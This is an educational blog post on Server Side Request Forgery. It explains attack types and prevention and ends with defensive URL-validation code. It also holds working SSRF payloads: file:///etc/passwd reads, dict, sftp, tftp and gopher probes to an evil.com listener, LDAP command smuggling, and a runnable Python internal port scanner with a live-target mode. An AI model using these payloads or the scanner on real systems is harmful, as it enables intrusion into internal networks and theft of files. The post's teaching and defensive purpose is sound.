SSRF: Server Side Request Forgery

Server Side Request Forgery (SSRF) is a web application or web server vulnerability that lets an attacker control the requests the vulnerable server makes to other systems. In other words, a flaw in the web application allows the attacker to choose where, and often what, the application sends on his behalf. The end target is usually an internal system that holds data and sits behind a firewall, IDS or IPS, and is therefore not reachable directly from the Internet.

In simple terms, an attacker sits at his desk and orders the web server to do the job on his behalf.

As mentioned above, the target systems usually sit behind a firewall, IDS or IPS, so the attacker cannot send requests to the victim server directly; he first has to confirm that the target is reachable and exploitable through the vulnerable server. To scan the network he does the following:

  • The attacker sends a request to the vulnerable web server that abuses the SSRF vulnerability.
  • The web server makes a request to the victim's server, which sits behind the firewall.
  • The victim's server responds with data.
  • If the vulnerable application returns what it fetched, the response is sent back to the attacker.
  • The attacker modifies the request and gains access using different techniques.

Impacts of SSRF Exploit

  • Attackers can scan the local (internal) or external network.
  • Attackers can read files from the exploited server (for example through the file:// scheme shown below).
  • Attackers can reach, and in some cases take control of, internal systems and the network.
  • In some cases an SSRF exploit can be chained into remote code execution, for example by sending crafted requests to an unauthenticated internal service.

Types of SSRF

There are a couple of SSRF types normally used to carry out the attack.

Direct SSRF

Direct SSRF can be carried out in a couple of different ways: (a) content-based SSRF and (b) Boolean-based SSRF.

Content-based SSRF is the most widely used type: the server includes the content fetched from the attacker-supplied URL in its own response, so the attacker reads the target's data directly.

The Boolean-based attack is carried out when the fetched content is not returned but the response still differs depending on whether the URL was reachable: the server sends an error message or a different response code (for example 404 or 500) for the attacker's request. The attacker then uses those differences to carry out the exploit.

Indirect SSRF

Indirect SSRF, also known as Blind SSRF, is carried out without getting any content, status code or error back from the target. The attacker cannot tell from the response body whether the target server is up or down, because nothing from the fetched resource is reflected back.

The attacker therefore relies on the time difference to determine the target machine's status. He repeats each request several times and compares how long the vulnerable server takes to answer. A request that takes much longer than usual indicates that the server-side fetch hung until its connection timeout, which means the specified host is down or the port is filtered; a fast answer means the host was reachable (the connection was accepted or refused immediately). Indirect SSRF is the most difficult type to exploit because there is no response from the target, so a "guessing" game based on timing is all the attacker has.

How to perform SSRF Exploit

Probing

Every exploit goes through a number of probing steps before it becomes an "exploit". The attacker tries different techniques against the target until he finds the one that works. The same applies to SSRF: the process of enumerating the target is called probing.

In SSRF probing, the attacker sends a request carrying a specific URL as the "payload" through an HTTP GET parameter or HTTP POST data; the parameter that carries it is commonly known as the "SSRF vector". The payloads normally contain special characters such as "?", "&" or "#", which have a meaning to the vulnerable server's own URL parser and therefore decide where the injected URL ends.

Example:

Consider a shop page that asks the web server to check stock by sending it a URL in a request parameter; the web server fetches that URL and returns the "stock status" to the requesting user's browser or app. If the web server is exploitable to SSRF, the attacker can intercept the request with a tool such as Burp Suite and replace the stock-check URL with http://localhost/admin.

The vulnerable server then fetches the contents of http://localhost/admin and returns them to the user. This is SSRF. The special characters mentioned above also come into play. If the target has an SSRF vulnerability in the URL http://mybestshoppe.com/?u=xxxxVULNURLsxx, where xxxxVULNURLsxx is the SSRF vector, the attacker can replace it with another website or target such as http://calling_url.com/?id=1&allow=yes, so the request becomes http://mybestshoppe.com/?u=http://calling_url.com/?id=1&allow=yes. Note that the unencoded "&" in that request is consumed by mybestshoppe.com's own query parser, which sees u=http://calling_url.com/?id=1 plus a separate allow=yes parameter; to deliver the whole inner URL the attacker has to percent-encode it (& as %26, ? as %3F, # as %23).
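To make that parsing point concrete, here is a small added example (my own code, not from the original post) that models how the vulnerable application's query parser sees the SSRF vector. It assumes the http://mybestshoppe.com/?u= endpoint named above and standard application/x-www-form-urlencoded parsing as implemented by Python's urllib.parse; the inner URLs are constructed.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Vulnerable endpoint and SSRF vector parameter named in the text above.
VULN_ENDPOINT = "http://mybestshoppe.com/"
VECTOR_PARAM = "u"

# Constructed inner URLs the attacker wants the server to fetch.
INNER_LOCALHOST = "http://localhost/admin"
INNER_WITH_AMP = "http://calling_url.com/?id=1&allow=yes"
INNER_WITH_HASH = "http://calling_url.com/#admin"


def naive_vector(inner: str) -> str:
    """Paste the target URL into the vector unencoded, exactly as written in the text."""
    return f"{VULN_ENDPOINT}?{VECTOR_PARAM}={inner}"


def encoded_vector(inner: str) -> str:
    """Percent-encode the target URL so its own '?', '&' and '#' survive the outer parser."""
    return f"{VULN_ENDPOINT}?{urlencode({VECTOR_PARAM: inner})}"


def url_the_server_fetches(request_url: str) -> str:
    """Model of the vulnerable app: read the vector parameter and hand it to the HTTP client.

    urlsplit() drops everything after '#' (the fragment) and parse_qs() splits on '&',
    which is what a real web framework does before the application sees the value.
    """
    params = parse_qs(urlsplit(request_url).query)
    return params.get(VECTOR_PARAM, [""])[0]


def stray_params(request_url: str) -> dict:
    """Parameters the outer application receives that were meant for the inner URL."""
    params = parse_qs(urlsplit(request_url).query)
    return {k: v for k, v in params.items() if k != VECTOR_PARAM}


if __name__ == "__main__":
    for inner in (INNER_LOCALHOST, INNER_WITH_AMP, INNER_WITH_HASH):
        for builder in (naive_vector, encoded_vector):
            req = builder(inner)
            print(f"{builder.__name__:15} -> server fetches {url_the_server_fetches(req)!r}"
                  f"  stray={stray_params(req)}")
```

Running it shows the naive vector losing allow=yes to the outer application and losing everything after # entirely, while the encoded vector delivers the full inner URL.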

Where You Can Find SSRF Vulnerabilities

  • SSRF is normally found wherever the application makes a network request to another server based on input that comes from the Internet.
  • Any feature that fetches a resource from a remote server (upload-from-URL, etc.).
  • Applications backed by databases such as Oracle, MongoDB, MSSQL and Postgres.
  • Email servers.
  • File processing, encoding/conversion processing, attribute (metadata) information processing, etc.

Different Ways of Exploiting SSRF

SSRF to Reflected XSS (SSRF to Cross-Site Scripting)

Simply fetch a file from an external site that carries a malicious payload and is served with an HTML-like content type; if the vulnerable application reflects the fetched body back to the browser, the payload executes in the context of the vulnerable site. Example: http://vuln-web-app.com:4200/?url=http://letmehackyourserver.com/virus.svg

file:///

The file payload is used to fetch a file from the server's own file system:
http://example.com/vuln-ssrf.php?url=file:///etc/passwd or http://example.com/vuln-ssrf.php?url=file:///C:/Windows/win.ini

The output of http://localhost/ssrf.php?image_url=file:///etc/passwd is the contents of the server's /etc/passwd, beginning with the familiar root entry (root:x:0:0:root:/root:/bin/bash).

dict:// –

The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol. Pointing the vulnerable fetcher at a listener confirms that the request arrives and fingerprints the HTTP client library the server uses (the CLIENT line below):

http://example.com/ssrf.php?url=dict://evil.com:1337/

evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 31126)
CLIENT libcurl 7.40.0

sftp:// –

SFTP (SSH File Transfer Protocol, also called Secure File Transfer Protocol) is a separate protocol packaged with SSH that transfers files over the secure SSH connection. The listener receives the SSH client banner, which reveals the library (libssh2) behind the server's URL fetcher:

http://example.com/ssrf.php?url=sftp://evil.com:1337/

evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 37146)
SSH-2.0-libssh2_1.4.2

ldap:// or ldaps:// or ldapi:// –

LDAP stands for Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access a distributed directory information service. In the payloads below %0a is a newline, so the attacker is smuggling line-based plaintext commands (here stats and quit) to whatever service listens on the chosen port:

http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit

tftp://

Trivial File Transfer Protocol (TFTP) is a simple lockstep file transfer protocol that allows a client to get a file from or put a file onto a remote host. Because it runs over UDP, the listener needs the -u flag:

http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET

evil.com:# nc -lvup 1337
Listening on [0.0.0.0] (family 0, port 1337)
TESTUDPPACKEToctettsize0blksize512timeout3

gopher:// –

Gopher is a distributed document delivery service. It allows users to explore, search and retrieve information residing in different locations in a seamless fashion. For SSRF it is valuable because everything after the item-type character (the "_" following the "/") is sent to the port as raw bytes, so the attacker can speak arbitrary line-based protocols through the vulnerable server. Note that the redirect trick below relies on the server's HTTP client following a redirect to a gopher:// URL: libcurl 7.65.2 and later only follow redirects to HTTP, HTTPS, FTP and FTPS by default (CURLOPT_REDIR_PROTOCOLS), so against a newer build the gopher:// URL has to be placed directly in the SSRF vector, and gopher support must be compiled into the build.

http://example.com/ssrf.php?url=http://attacker.com/gopher.php

gopher.php (hosted on attacker.com) redirects the server's HTTP client to the gopher URL:

<?php
   // Redirect the vulnerable fetcher to a gopher:// URL; the client strips the
   // "_" item type and sends the rest ("Hi\nssrf\ntest") to evil.com:1337 verbatim.
   header('Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest');
?>

evil.com:# nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 49398)
Hi
ssrf
test


Scan for internal networks and ports –

The victim organization may be running servers on its LAN (Kibana, Elasticsearch, MongoDB, ...) that cannot be reached from the Internet directly because the firewall blocks them. Through the SSRF vector the vulnerable server becomes a proxy into that LAN: the attacker iterates over internal addresses and ports and reads the result from the content, the status code or the response time, as described under the SSRF types above.
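The following is an added example of that internal scan (my own code, not from the original post). It builds each probe through the http://example.com/ssrf.php?url= vector used in the examples above and applies all three inference methods from the SSRF types section: content-based (a service banner in the reflected body), Boolean-based (status code only) and time-based (blind, the fetch hanging until the server's connect timeout). The hosts, ports, responses and the 5-second timeout are constructed; fake_send stands in for the network so the script runs offline, and live_send shows how the same scan would be driven against a real target.

```python
import time
from typing import Callable, Dict, Iterable, Tuple
from urllib.parse import urlencode

VULN_ENDPOINT = "http://example.com/ssrf.php"   # vulnerable fetcher from the examples above
VECTOR_PARAM = "url"
TIMEOUT_HINT = 5.0   # assumed connect timeout of the server-side HTTP client, in seconds

# (status returned to us, body returned to us, seconds elapsed) for one probe.
Response = Tuple[int, str, float]

# Constructed LAN standing in for the network behind the firewall, keyed by inner URL.
_FAKE_LAN: Dict[str, Response] = {
    "http://10.0.0.5:9200/":  (200, '{"name":"node-1","cluster_name":"elasticsearch"}', 0.05),
    "http://10.0.0.5:5601/":  (200, "<title>Kibana</title>", 0.07),
    "http://10.0.0.5:27017/": (500, "Connection reset by peer", 0.04),   # open, but not HTTP
    "http://10.0.0.6:9200/":  (500, "Connection refused", 0.03),         # host up, port closed
}

# Banner fragments that identify a service when its response is reflected to us.
FINGERPRINTS = {"elasticsearch": "Elasticsearch", "kibana": "Kibana", "mongodb": "MongoDB"}


def ssrf_request(target_url: str) -> str:
    """Wrap the internal URL in the SSRF vector, percent-encoded so ':' '/' '?' '&' survive."""
    return f"{VULN_ENDPOINT}?{urlencode({VECTOR_PARAM: target_url})}"


def fake_send(target_url: str) -> Response:
    """Offline stand-in for the vulnerable server; unknown targets behave like a timeout."""
    return _FAKE_LAN.get(target_url, (504, "", TIMEOUT_HINT))


def live_send(target_url: str) -> Response:
    """Real sender (not used in the offline demo): time one GET through the vulnerable endpoint."""
    from urllib.error import HTTPError, URLError
    from urllib.request import urlopen
    t0 = time.monotonic()
    try:
        with urlopen(ssrf_request(target_url), timeout=TIMEOUT_HINT + 2) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace"), time.monotonic() - t0
    except HTTPError as err:
        return err.code, err.read(4096).decode("utf-8", "replace"), time.monotonic() - t0
    except URLError:
        return 0, "", time.monotonic() - t0


def classify(status: int, body: str, elapsed: float) -> str:
    """Infer the state of the internal target from what the vulnerable server gave back."""
    # Time-based (blind): the server-side fetch hung until its timeout -> host down or port filtered.
    if elapsed >= 0.9 * TIMEOUT_HINT:
        return "filtered/down (timeout)"
    # Content-based: the reflected body leaks a recognizable banner.
    lowered = body.lower()
    for needle, name in FINGERPRINTS.items():
        if needle in lowered:
            return f"open: {name}"
    # Boolean-based: only the status code distinguishes the outcomes.
    if status == 200:
        return "open: unknown HTTP service"
    return f"closed or non-HTTP (server returned {status} quickly)"


def scan(hosts: Iterable[str], ports: Iterable[int],
         send: Callable[[str], Response] = fake_send) -> Dict[Tuple[str, int], str]:
    """Probe every host:port pair through the SSRF vector and classify each answer."""
    results: Dict[Tuple[str, int], str] = {}
    for host in hosts:
        for port in ports:
            status, body, elapsed = send(f"http://{host}:{port}/")
            results[(host, port)] = classify(status, body, elapsed)
    return results


if __name__ == "__main__":
    verdicts = scan(["10.0.0.5", "10.0.0.6", "10.0.0.7"], [9200, 5601, 27017])
    for (host, port), verdict in verdicts.items():
        print(f"{host}:{port:<6} {verdict}")
```

To run it against a real target pass send=live_send; the timeout threshold then has to be calibrated against a few known-dead addresses first, because the vulnerable server's own latency shifts every measurement.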


Prevention

  1. Disable unused URL schemes such as file://, ftp:// and gopher:// (and dict://, sftp://, ldap:// and tftp:// shown above) in the server-side HTTP client, so that only http:// and https:// are accepted.
  2. Password-protect the internal services and add an extra layer of protection such as an IDS. This only limits the damage; it does not close the SSRF itself, so the URL the application fetches must still be validated.
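As an added example going beyond the two items above (my own code, not from the original post), here is the server-side check a fetcher should apply to a user-supplied URL before requesting it: accept only http/https, reject embedded credentials, resolve the hostname and refuse any address that is not globally routable (loopback, RFC 1918, link-local including the 169.254.169.254 cloud metadata address, IPv4-mapped IPv6, unique-local IPv6), and return the vetted IP so the caller connects to that address rather than re-resolving the name. The resolver parameter is my addition so the demo runs offline; the names and addresses in FAKE_DNS are constructed, and socket.getaddrinfo is used by default.

```python
import ipaddress
import socket
from typing import Callable, List
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

Resolver = Callable[[str], List[str]]


def system_resolver(host: str) -> List[str]:
    """Default resolver: every A/AAAA answer for the name (also accepts IP literals)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


# Constructed DNS data for the offline demo; "evil.example" is a name an attacker
# points at loopback to slip past hostname-only blocklists.
FAKE_DNS = {
    "mybestshoppe.com": ["93.184.216.34"],   # constructed public address
    "internal.corp":    ["10.0.0.5"],
    "evil.example":     ["127.0.0.1"],
}


def fake_resolver(host: str) -> List[str]:
    """Offline resolver: IP literals need no lookup, names come from FAKE_DNS."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return FAKE_DNS.get(host, [])


def vet_fetch_url(url: str, resolver: Resolver = system_resolver) -> str:
    """Validate an outbound URL and return the single IP address the fetcher must connect to.

    Raises ValueError with the reason when the URL must not be fetched.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {scheme or '(none)'!r} not allowed")
    host = parts.hostname              # lower-cased, IPv6 brackets stripped
    if not host:
        raise ValueError("no host in URL")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials in URL not allowed")   # http://trusted.com@evil/ tricks
    addresses = resolver(host)
    if not addresses:
        raise ValueError(f"{host} does not resolve")
    for addr in addresses:
        ip = ipaddress.ip_address(addr)
        # is_global is False for loopback, RFC 1918, link-local (169.254.0.0/16, which holds
        # the cloud metadata address), CGNAT, IPv4-mapped IPv6, unique-local IPv6, etc.
        if not ip.is_global:
            raise ValueError(f"{host} resolves to non-public address {addr}")
    # Pin the connection to the vetted address (the Host header still carries the name) so a
    # second lookup by the HTTP client cannot be answered differently (DNS rebinding).
    return addresses[0]


def is_safe_fetch_url(url: str, resolver: Resolver = system_resolver) -> bool:
    """Boolean convenience wrapper around vet_fetch_url()."""
    try:
        vet_fetch_url(url, resolver)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for candidate in ("http://mybestshoppe.com/?u=1", "http://internal.corp/",
                      "http://127.0.0.1/admin", "http://[::1]/admin",
                      "http://169.254.169.254/latest/meta-data/", "file:///etc/passwd",
                      "gopher://evil.com:1337/_x", "http://evil.example/",
                      "http://mybestshoppe.com@127.0.0.1/"):
        try:
            print(f"ALLOW {candidate} -> {vet_fetch_url(candidate, fake_resolver)}")
        except ValueError as why:
            print(f"DENY  {candidate}: {why}")
```

In a real fetcher the returned address replaces the hostname in the connection (with the original name sent in the Host header and TLS SNI), which is the part most HTTP client libraries do not do for you; without it, a name that resolves to a public address during the check and to 127.0.0.1 a moment later still gets through. Every redirect must be re-vetted with the same function, since the gopher.php example above relies on exactly that gap.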

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: https://www.hackthebox.eu/home/users/profile/68523
